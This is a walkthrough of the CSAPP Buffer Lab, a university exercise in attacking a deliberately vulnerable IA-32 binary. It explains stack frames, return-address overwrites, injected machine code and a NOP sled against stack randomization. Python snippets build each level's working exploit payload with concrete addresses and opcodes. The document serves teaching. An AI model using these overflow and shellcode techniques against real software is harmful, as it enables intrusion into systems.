The CSAPP Buffer Lab is the buffer overflow lab from Computer Systems: A Programmer's Perspective (second edition). It asks you to apply buffer overflow techniques to five levels of increasing difficulty: smoke (Level 0), fizz (Level 1), bang (Level 2), boom (Level 3), and kaboom (Level 4). Working through it deepens your practical understanding of function calls and the buffer overflow mechanism on the IA-32 architecture.
This record uses the self-study handout version from the book's companion website: http://csapp.cs.cmu.edu/2e/labs.html.
The original course lab instructions (the CSAPP Buffer Lab writeup): http://csapp.cs.cmu.edu/2e/buflab.pdf
For the use of GDB and GCC in this lab, see another post by the author: Linux editing, compiling, debugging commands summary--GCC and GDB description
The self-study handout of the Buffer Lab is a .tar archive. For how to unpack it, see the post Linux file Packaging, decompression instructions--TAR,GZIP,BZIP2
Experiment Preparation:
Extracting the archive produces a directory named buflab-handout that contains three executable files:
bufbomb: the buffer bomb program to be attacked;
hex2raw: a tool that converts a hexadecimal text string into raw bytes (the required input may contain bytes that are not printable ASCII characters, so this tool is used for the conversion);
makecookie: a tool that generates a specific cookie from a user ID; it is not needed for self-study;
Experimental Analysis: (see the introduction in the Buffer Lab writeup for more information)
getbuf()
bufbomb reads its input through a custom getbuf() function and copies it into the target memory. This function is implemented mainly through Gets().
/* Buffer size for getbuf */
#define NORMAL_BUFFER_SIZE 32

int getbuf()
{
    char buf[NORMAL_BUFFER_SIZE];
    Gets(buf);
    return 1;
}
Gets() reads from standard input (the input ends at "\n" or EOF, and the length read is not checked) and stores the string, followed by a terminating null character, in the specified memory area. Here we know that the target character array buf is declared with a length of 32 bytes.
Note: buf is declared as 32 bytes long, but the amount of space actually allocated on the stack, and its position, depend on the compiler. Since the executable is provided directly here, the implementation of getbuf can be inspected with objdump -d bufbomb.
By the argument-passing rules for function calls, the start address of buf is placed on the stack before Gets is called. In the disassembly, %eax holds %ebp-40, which is the start address of buf, so the allocated space is not the same as the declared length. (To satisfy data alignment, the GCC convention on IA-32 keeps each stack frame a multiple of 16 bytes.) The stack structure of getbuf is as follows:
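The layout just described can be tabulated with a short sketch. The only input is the offset stated above (buf starts at %ebp-40); the helper names are hypothetical and exist only for illustration.

```python
# Sketch of getbuf's stack frame on IA-32, using the offset stated in the text.
# Assumption: buf starts at %ebp-40, as read from the disassembly of getbuf.

BUF_OFFSET = -40   # buf[0] relative to %ebp
WORD = 4           # size of a saved register or return address on IA-32


def getbuf_frame():
    """Return (name, offset from %ebp) pairs, highest address first."""
    return [
        ("return address", +WORD),  # pushed by the call instruction in test()
        ("saved %ebp", 0),          # pushed by getbuf's prologue
        ("buf[0]", BUF_OFFSET),     # start of the region that holds buf
    ]


def bytes_before_return_address():
    """Number of bytes written from buf[0] before the return address is reached."""
    return -BUF_OFFSET + WORD       # 40 bytes of frame space + 4 bytes of saved %ebp


if __name__ == "__main__":
    for name, offset in getbuf_frame():
        print(f"%ebp{offset:+d}: {name}")
    print("padding before return address:", bytes_before_return_address())
```

The value 44 computed here is the padding length used in the levels that follow.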
When fewer than 32 bytes are entered, the output is as follows:
When more than 32 bytes are entered, the output is as follows:
bufbomb is normally run from the command line as ./bufbomb -u idname, and the program generates a specific cookie from the idname supplied. During the lab you construct, for each task, an input sequence (raw bytes, as far as the computer is concerned) that produces the required behavior, and in this way complete the five tasks.
hex2raw: the byte string required as input may not correspond to printable ASCII characters. For example, when an address contains the byte 0x80, the corresponding character cannot be typed on the keyboard (refer to XXXXX), so hex2raw is used for the conversion. hex2raw reads the hexadecimal string in the input file and converts each pair of hexadecimal digits into the corresponding byte. To enter the byte 0x80, simply write 80 in the input file and hex2raw converts it to the corresponding raw byte. The constructed string can then be fed in with cat filename | ./hex2raw | ./bufbomb -u idname, where filename is the file containing the hexadecimal string to convert. (Note that the hex2raw tool provided by the lab is a 64-bit binary, which can be checked with the command file hex2raw. If you run it in a 32-bit environment you get an error like "cannot execute binary file: format error". bufbomb itself is a 32-bit binary.)
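To make the conversion concrete, here is a rough stand-in for the core of what hex2raw does. It is an illustration only, not the lab's actual tool: the function name is hypothetical, and any extra features of the real hex2raw are ignored.

```python
# Minimal sketch: turn whitespace-separated hex byte pairs into raw bytes.
# This only mimics the basic behavior described in the text.

def hex_to_raw(text):
    """Convert a string of hex pairs such as '30 30 80' into a bytes object."""
    return bytes(int(pair, 16) for pair in text.split())


if __name__ == "__main__":
    raw = hex_to_raw("30 30 80")
    # 0x30 is the printable character '0'; 0x80 has no printable ASCII form.
    print(raw)
```

Writing 80 in the text file is therefore enough to get the unprintable byte 0x80 into the program's input.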
The goal of the lab is to construct the correct input strings so that each one produces a specific behavior, completing the five tasks.
Experimental process:
Level 0: Candle
In bufbomb there is a function test(), which calls getbuf() to read the input, uses uniqueval() to check whether the stack has been corrupted, and then prints a message according to the result.
void test()
{
    int val;
    /* Put canary on stack to detect possible corruption */
    volatile int local = uniqueval();

    val = getbuf();

    /* Check for corrupted stack */
    if (local != uniqueval()) {
        printf("Sabotaged!: the stack has been corrupted\n");
    }
    else if (val == cookie) {
        printf("Boom!: getbuf returned 0x%x\n", val);
        validate(3);
    } else {
        printf("Dud: getbuf returned 0x%x\n", val);
    }
}
bufbomb also contains a function smoke(). The task of Level 0 is to change the program flow so that when getbuf(), called from test(), returns, execution goes directly to smoke() instead of returning to test().
void smoke()
{
    printf("Smoke!: You called smoke()\n");
    validate(0);
    exit(0);
}
This level is mainly about the return address in a function call. During a call, control jumps to the target function and the return address (the address of the instruction following the call) is pushed on the stack; when the called function ends, execution resumes at that instruction. So to reach smoke() directly when getbuf returns, the key is to overwrite getbuf's return address with the start address of smoke(). Note that although test() has a canary to detect stack corruption, this task transfers control to another function right after getbuf ends, so the check is never reached. You can therefore simply construct a string longer than the array so that it overwrites the return address with the address of the target function.
From the earlier analysis of getbuf's stack space, a string that overwrites the return address should consist of 44 padding bytes (the 40 bytes allocated for buf plus the 4 bytes of saved %ebp) followed by the new return address.
Through GDB debugging, we find that the start address of smoke is 0x08048c18.
The constructed string is: 44 bytes of 30 + 18 8c 04 08 (little-endian). It is written to a file for hex2raw to convert, where 30 is the hexadecimal ASCII code of the character 0, and the last 4 bytes are the start address of smoke in little-endian order.
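As a sketch of how this input file could be generated rather than typed by hand, the snippet below builds the same 48 bytes and prints them as hex text for hex2raw. The address and padding length are the ones given above; the function name is hypothetical.

```python
import struct

SMOKE_ADDR = 0x08048C18  # start of smoke(), as found with GDB in this write-up
PAD_LEN = 44             # 40 bytes of buffer space + 4 bytes of saved %ebp


def level0_hex():
    """Return the hex text for Level 0, suitable as input to hex2raw."""
    # "<I" packs a 32-bit unsigned integer in little-endian byte order.
    payload = b"0" * PAD_LEN + struct.pack("<I", SMOKE_ADDR)
    return " ".join(f"{byte:02x}" for byte in payload)


if __name__ == "__main__":
    print(level0_hex())
```

Saving the printed text to a file and piping it through hex2raw gives the raw input described above.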
The smoke function was successfully called:
Level 1: Sparkler
bufbomb contains another function, fizz(), whose source is shown below. fizz() compares its argument with the cookie and succeeds when the two are equal. The cookie here is the one generated from the user ID when running ./bufbomb -u userid.
void fizz(int val)
{
    if (val == cookie) {
        printf("Fizz!: You called fizz(0x%x)\n", val);
        validate(1);
    } else
        printf("Misfire: You called fizz(0x%x)\n", val);
    exit(0);
}
The task of Level 1 is (1) to modify getbuf's return address so that it returns to fizz() instead of test(), and (2) to pass the check inside fizz(), which requires the cookie value to be passed as the argument;
This level is mainly about how function arguments are passed.
In the left part of the figure:
(1) The arguments of the called function are pushed on the stack by the caller in right-to-left order, and inside the called function they are accessed through addresses such as %ebp+8 and %ebp+12.
(2) The call instruction pushes the return address on the stack. The called function then pushes the caller's frame pointer (the value in %ebp) and sets %ebp to %esp, so that %ebp points to its own stack frame. The new %ebp is therefore separated from the function's arguments by the saved %ebp and the return address, which is why the first argument is found at %ebp+8.
In the right part of the figure:
(1) The arrows on the left mark the position of %esp. When the function returns, %ebp is first copied to %esp, so the top of the stack is at position (1). After pop %ebp restores %ebp, %esp is at position (2). Finally the ret instruction pops the return address, and %esp points to position (3);
(2) Because we want to return into fizz, the return address has been replaced with the address of fizz. Note that there is no call instruction, so no return address is pushed. fizz then runs as usual, with its stack starting at the red line: it first pushes %ebp, which gives the new %ebp position. fizz reads its argument at %ebp+8 as usual, so position (1) in the stack diagram should be overwritten with the cookie value;
The constructed input string should therefore be: 44 padding bytes + start address of fizz + 4 padding bytes + cookie value. The start address of fizz can be found with GDB, and the cookie value is the one generated by bufbomb; both are written in little-endian order.
The constructed string is: 44 bytes of 30 + the 4-byte start address of fizz + 4 bytes of 30 + da 31 3e 37 (cookie).
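The layout above can be sketched as a small builder. The cookie value 0x373e31da is the one used elsewhere in this write-up. The fizz address is left as a parameter, since it has to be read from GDB; the value in the usage line is a made-up placeholder, not the real address.

```python
import struct

COOKIE = 0x373E31DA  # cookie value used in this write-up


def level1_payload(fizz_addr, cookie=COOKIE):
    """Build the Level 1 input: padding, fizz address, filler, cookie."""
    pad = b"0" * 44                     # buffer space + saved %ebp
    ret = struct.pack("<I", fizz_addr)  # overwrites getbuf's return address
    filler = b"0" * 4                   # slot where fizz expects a return address
    arg = struct.pack("<I", cookie)     # read by fizz at %ebp+8
    return pad + ret + filler + arg


if __name__ == "__main__":
    # 0x08048C42 is a hypothetical placeholder; substitute the address from GDB.
    payload = level1_payload(0x08048C42)
    print(" ".join(f"{byte:02x}" for byte in payload))
```

The 4 filler bytes matter: without a call instruction nothing pushes a return address, so they occupy the slot between the overwritten return address and the argument.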
Results:
Level 2: Firecracker
A more sophisticated way to construct the input string is to include machine code that does real work in the string itself, and to modify the function's return address so that it points to this code, which is then executed to carry out the intended action.
bufbomb has a function bang, which compares the global variable global_value with the cookie, validates the result, and prints the value of global_value.
int global_value = 0;

void bang(int val)
{
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
The task of Level 2 is: (1) to set global_value to the cookie value by executing machine instructions supplied in the input, and (2) as in Level 0, to make getbuf(), called from test(), jump directly to bang() on return instead of returning to test();
The key to the task is how to construct the machine code and make the program jump to it, while also paying attention to how the argument of bang is passed.
The process of constructing the input string:
(1) The address of the global variable global_value does not change while the program runs, so it can be read directly in GDB and assigned to with a mov instruction;
(2) The return address of getbuf is modified to point to the start of the constructed machine code, which is the start address of the buf array;
(3) Since getbuf's return address is already used to point to the injected machine code, extra instructions are needed to jump to bang. Because the program is already compiled, the address of bang does not change, so it can be used directly. Use push to place the address of bang on the stack, then use ret to jump to it. (push places data on top of the stack; ret pops the data on top of the stack and jumps to it as an address);
(4) Pay attention to how the argument of bang is passed. In Level 0 and Level 1, the machine code being executed was in the code segment, pointed to by the PC, while data operations took place on the stack, pointed to by %esp. After the first jump in Level 2, the machine code being executed is in a buffer on the stack, pointed to by the PC, and data operations also take place on the stack, pointed to by %esp. The two must be kept apart: the former is for execution, the latter for data. The figure shows the positions of %esp and the PC after the function's ret instruction. The argument can be passed as in Level 1, or assigned directly through %esp+4;
The constructed input string is: executable machine code + padding + address of the injected machine code.
The start address of bang, 0x08048c9d, is obtained through GDB.
Similarly, the disassembly of bang compares the values at 0x804d100 and 0x804d108. Inspecting address 0x804d108 shows that it stores the cookie, so 0x804d100 holds the global variable global_value.
Set a breakpoint inside getbuf and run to it to get the start address of the buf array, 0x55683978. (Execution has to be inside getbuf so that %ebp points to getbuf's stack frame and %ebp-40 is the start address of buf; otherwise printing %ebp-40 may point somewhere else.)
The constructed executable code is:
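movl $0x373e31da, 0x804d100   # set global_value to the cookie value
movl 0x804d100, %eax
movl %eax, 4(%esp)            # place the value of global_value on the stack as bang's argument
pushl $0x08048c9d             # push the start address of bang; note that constants need a leading $
ret                           # jump to the address on top of the stack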
The assembly instructions above can be assembled (the method is given in the last part of the lab writeup), and objdump or GDB disassembly can then be used to obtain the hexadecimal form of the machine code. (Note that disassembly listings do not always show the instruction suffixes b, w, l, q explicitly, but you may need to add a suffix when writing the code yourself for it to assemble.)
The input string actually used consists of: executable code (25 bytes) + padding (19 bytes) + start address of the array (4 bytes)
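The 25 + 19 + 4 byte layout can be checked with a sketch like the one below. The addresses and cookie are the ones quoted in this section. The opcode bytes are hand-encoded from the standard IA-32 encodings of these five instructions and should be treated as an assumption to verify against your own objdump output.

```python
import struct

COOKIE = 0x373E31DA
GLOBAL_VALUE_ADDR = 0x0804D100  # address of global_value, from the disassembly of bang
BANG_ADDR = 0x08048C9D          # start of bang(), from GDB
BUF_ADDR = 0x55683978           # start of buf inside getbuf, from GDB


def le32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value)


def level2_payload():
    """Build the Level 2 input: injected code, padding, address of buf."""
    code = (
        b"\xc7\x05" + le32(GLOBAL_VALUE_ADDR) + le32(COOKIE)  # movl $cookie, global_value
        + b"\xa1" + le32(GLOBAL_VALUE_ADDR)                   # movl global_value, %eax
        + b"\x89\x44\x24\x04"                                 # movl %eax, 4(%esp)
        + b"\x68" + le32(BANG_ADDR)                           # pushl $bang
        + b"\xc3"                                             # ret
    )
    padding = b"0" * (44 - len(code))  # fill up to the return address slot
    return code + padding + le32(BUF_ADDR)


if __name__ == "__main__":
    print(" ".join(f"{byte:02x}" for byte in level2_payload()))
```

Computing the padding from the code length keeps the return address at offset 44 even if the instruction sequence changes.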
The result after execution is:
Level 3: Dynamite
So far, the attacks have diverted the normal control flow to another function, after which the program terminates, so the damage done to the stack and to the values stored on it did not matter. A more sophisticated buffer attack executes constructed instructions that change register or memory values and then lets the program return to its original control flow as normal. The task of Level 3 is to construct instructions so that getbuf returns to test normally, with the cookie as getbuf's return value.
The following points need attention:
(1) The constructed machine instructions are stored in getbuf's buffer; to execute them, only getbuf's return address needs to be modified. Note that by the time execution jumps to the constructed code, getbuf has already finished and its return value 1 is already in register %eax (the jump to the modified address happens at the final ret instruction);
(2) Recall the function call procedure: the call instruction pushes the return address on the stack, and the first step after entering the function is to save %ebp. Overwriting the return address therefore also overwrites the saved %ebp. At the end of getbuf, %esp is set to the value of getbuf's frame pointer %ebp (a mov instruction), and then the saved %ebp value is popped into register %ebp. Since the saved %ebp was overwritten along with the return address, %ebp will hold an arbitrary value;
(3) Because the task requires a normal return to test, and test performs a buffer overflow check (the uniqueval function), the length of the constructed string may need attention;
In summary, the constructed code should: (1) set %eax, which holds the return value; (2) restore register %ebp to its normal value, here the frame pointer of test; (3) push getbuf's normal return address on the stack and return to test with a ret instruction.
Using GDB, set a breakpoint inside getbuf to see the saved return address, the saved %ebp, and related information. p $ebp shows getbuf's frame pointer, and x/2xw $ebp shows the two consecutive 4-byte words starting at address %ebp (recall getbuf's stack structure: these hold the saved %ebp and the return address). This gives a return address of 0x08048dbe and a saved %ebp of 0x556839d0.
The constructed executable code is:
movl $0x373e31da, %eax   # set the return value to the cookie value
movl $0x556839d0, %ebp   # restore the saved %ebp value that was overwritten
pushl $0x08048dbe        # push the return address
ret                      # jump
The string is constructed as follows: constructed code (16 bytes) + padding (28 bytes) + modified return address, that is, the start address of the array (4 bytes)
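The 16 + 28 + 4 byte layout can be reproduced with the following sketch. All values are the ones quoted in this write-up (cookie, saved %ebp, return address into test, start address of buf). The opcode bytes are hand-encoded from the standard IA-32 encodings and should be checked against a disassembly.

```python
import struct

COOKIE = 0x373E31DA
SAVED_EBP = 0x556839D0    # frame pointer of test(), read with x/2xw $ebp
TEST_RET = 0x08048DBE     # getbuf's normal return address inside test()
BUF_ADDR = 0x55683978     # start of buf, where the injected code is placed


def le32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value)


def level3_payload():
    """Build the Level 3 input: injected code, padding, address of buf."""
    code = (
        b"\xb8" + le32(COOKIE)       # movl $cookie, %eax
        + b"\xbd" + le32(SAVED_EBP)  # movl $saved_ebp, %ebp
        + b"\x68" + le32(TEST_RET)   # pushl $return_address
        + b"\xc3"                    # ret
    )
    padding = b"0" * (44 - len(code))
    return code + padding + le32(BUF_ADDR)


if __name__ == "__main__":
    print(" ".join(f"{byte:02x}" for byte in level3_payload()))
```

The payload stops right after the return address slot, so nothing above it in test's frame is touched.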
The results of the implementation are as follows:
Level 4: Nitroglycerin
For a given program, the stack position differs from one run to the next, especially when it is run by different users. There are several reasons for this. One is that all the environment variables are placed as strings at the bottom of the stack (the high addresses) when the program starts. Different environment variable values need different amounts of stack space, so the stack position shifts, and the effect is more pronounced between different users. Similarly, the stack position when the program runs normally may differ from the one seen under GDB, because data that GDB itself needs is also placed on the stack.
For getbuf, bufbomb includes features that stabilize the stack position, so the addresses needed for the attack can be obtained directly and hard-coded into the machine code, which greatly reduces the difficulty. This is far too idealized for real-world situations. For Level 4 you need to start bufbomb with the -n option, so that the stack position is no longer stable while the attack still relies on the same buffer overflow principle.
When the program runs with the -n option, it uses the getbufn function (instead of getbuf) to read the input. getbufn behaves like getbuf, but its input array is 512 bytes long. Before calling getbufn, the program allocates a random amount of space on the stack, so the stack position of getbufn is no longer fixed across calls; in fact %ebp differs by as much as ±240. Also, with the -n option the program asks for the input string 5 times. The 5 inputs meet 5 different stack positions, and the cookie value must be returned successfully each time. The task of Level 4 is the same as Level 3: getbufn must return the cookie value to its caller testn, rather than the usual 1.
Here the program adds stack randomization: before the call, it first allocates a block of stack space of random size. The program does not use this space, but because its length varies, the stack position changes on every run (the relative structure of the stack stays the same, but the address of every element on it changes), see Figure I. The main consequence is that the earlier method of overwriting getbufn's return address with a fixed new return address is restricted. Because the stack position differs each time, the start of the injected machine code also differs. (Recall that earlier the machine code was placed at the start of the input string, so setting the return address to the start address of the input array, which was fixed, was enough to execute the constructed code.) It is now difficult to specify the address of the constructed code directly.
Stack randomization is defeated here mainly with a "NOP sled". A NOP sled is a run of nop instructions (nop is short for "no operation", machine code 0x90) placed before the constructed machine code; a nop only advances the PC and does nothing else. As long as the overwritten return address points anywhere inside the nop sequence, the nop instructions are executed one after another until the actual constructed machine code is reached, which relaxes the requirement on the return address used for the overwrite.
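A tiny simulation may make the sled argument easier to see. It is a sketch under simplified assumptions: memory is modeled as a byte string, only nop is interpreted, and the base address is a made-up placeholder. The sled length of 506 and the ±240 variation are the figures quoted in this write-up.

```python
NOP = 0x90  # machine code of the IA-32 nop instruction


def first_real_instruction(memory, start):
    """Step over nops from index start; return the index of the first non-nop byte."""
    pc = start
    while memory[pc] == NOP:
        pc += 1
    return pc


def lands_in_sled(ret_addr, buf_start, sled_len):
    """True if ret_addr points at a nop or at the first byte after the sled."""
    return buf_start <= ret_addr <= buf_start + sled_len


if __name__ == "__main__":
    sled_len = 506
    memory = bytes([NOP]) * sled_len + b"\xb8\xda\x31\x3e\x37\xc3"
    # Every entry point inside the sled slides to the same first instruction.
    print(all(first_real_instruction(memory, s) == sled_len
              for s in range(sled_len + 1)))

    base = 0x55683000            # hypothetical nominal buffer address
    fixed_ret = base + 253       # one fixed guess near the middle of the sled
    # The buffer may move by up to 240 bytes either way between runs.
    print(all(lands_in_sled(fixed_ret, base + shift, sled_len)
              for shift in range(-240, 241)))
```

Aiming near the middle of the sled gives roughly equal slack in both directions, which is why a single fixed return address can work for all five inputs.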
The constructed string is: nop instruction sequence + constructed machine code + return address. In this lab the overwrite is done with a single fixed return address.
Looking at the implementation of getbufn, the space allocated for the array is 520 bytes (0x208), so reaching the return address requires 520 (array space) + 4 (saved %ebp) = 524 bytes of fill.
View the value of %ebp with p $ebp, and view the saved %ebp and the return address with x/2xw $ebp.
The approach is as follows:
(1) To return the cookie value to testn, getbufn's return address again has to be modified so that the constructed code is executed. That code performs three steps: set the return value, restore %ebp, and return to testn;
(2) In step (1), setting the return value in %eax and returning to testn are the same as in Level 3. The return value is always set to the cookie, and the return address into testn is always the same (stack randomization only affects addresses on the stack; executable code lives in the code segment and is not affected in this setting);
(3) The remaining question is how to restore the overwritten %ebp. Stack randomization allocates a variable amount of space on the stack, which changes the addresses of the elements on it. However, since the program always performs the same operations, the relative positions (distances) of the stack elements it uses do not change from run to run, so %ebp can be recovered. The recovery is done by the injected code. At that point %ebp holds a junk value (see the Level 3 analysis), but %esp is still valid, and the overwritten saved %ebp can be derived from %esp. From the values of the saved %ebp and %ebp obtained above, their difference is 0x38.
Figure
The constructed string sequence is: nop instruction sequence (506 bytes) + executable code (18 bytes) + address for the overwrite (4 bytes)
To check the input while debugging, set breakpoints at 0x0804921b and after the call instruction, which correspond to the state before and after the input is read, and verify that the constructed string has the expected effect.
The following shows how the stack changes between two runs while debugging the program with GDB. In the two runs, %ebp and the saved %ebp both change, while the return address does not. The return address points to code at a fixed position in the code segment, which stack randomization does not affect, whereas data on the stack is affected.
The constructed executable code is:
movl $0x373e31da, %eax   # set the return value to the cookie value
movl %esp, %ebx
addl $0x28, %ebx
movl %ebx, %ebp          # restore %ebp from the value of %esp
pushl $0x08048e3a        # push the return address
ret                      # jump back to the original function
The constructed input string is: nop instruction sequence (506 bytes) + constructed instructions (18 bytes) + new address for the overwrite (4 bytes)
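The 506 + 18 + 4 byte layout can be assembled with a sketch like this one. The cookie, the 0x28 offset, and the return address into testn are taken from the listing above. The address that lands in the sled is not given in this write-up, so it is a parameter here and the value in the usage line is a hypothetical placeholder. The opcode bytes are hand-encoded and should be verified against a disassembly.

```python
import struct

COOKIE = 0x373E31DA
TESTN_RET = 0x08048E3A   # return address into testn, from the listing above
FILL_LEN = 524           # 520 bytes of array space + 4 bytes of saved %ebp


def le32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value)


def level4_payload(ret_into_sled):
    """Build the Level 4 input: nop sled, injected code, address inside the sled."""
    code = (
        b"\xb8" + le32(COOKIE)      # movl $cookie, %eax
        + b"\x89\xe3"               # movl %esp, %ebx
        + b"\x83\xc3\x28"           # addl $0x28, %ebx
        + b"\x89\xdd"               # movl %ebx, %ebp
        + b"\x68" + le32(TESTN_RET) # pushl $return_address
        + b"\xc3"                   # ret
    )
    sled = bytes([0x90]) * (FILL_LEN - len(code))
    payload = sled + code + le32(ret_into_sled)
    if b"\n" in payload:
        # The input routine stops at a newline, so 0x0a must not appear.
        raise ValueError("payload contains 0x0a, which would end the input early")
    return payload


if __name__ == "__main__":
    # 0x55683800 is a hypothetical placeholder; pick an address inside the sled from GDB.
    payload = level4_payload(0x55683800)
    print(len(payload))
```

Because the code sits at the end of the fill rather than the start, every byte before it is sled, which maximizes the range of return addresses that work.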
The end result is:
CSAPP Buffer Lab Record (IA32 version)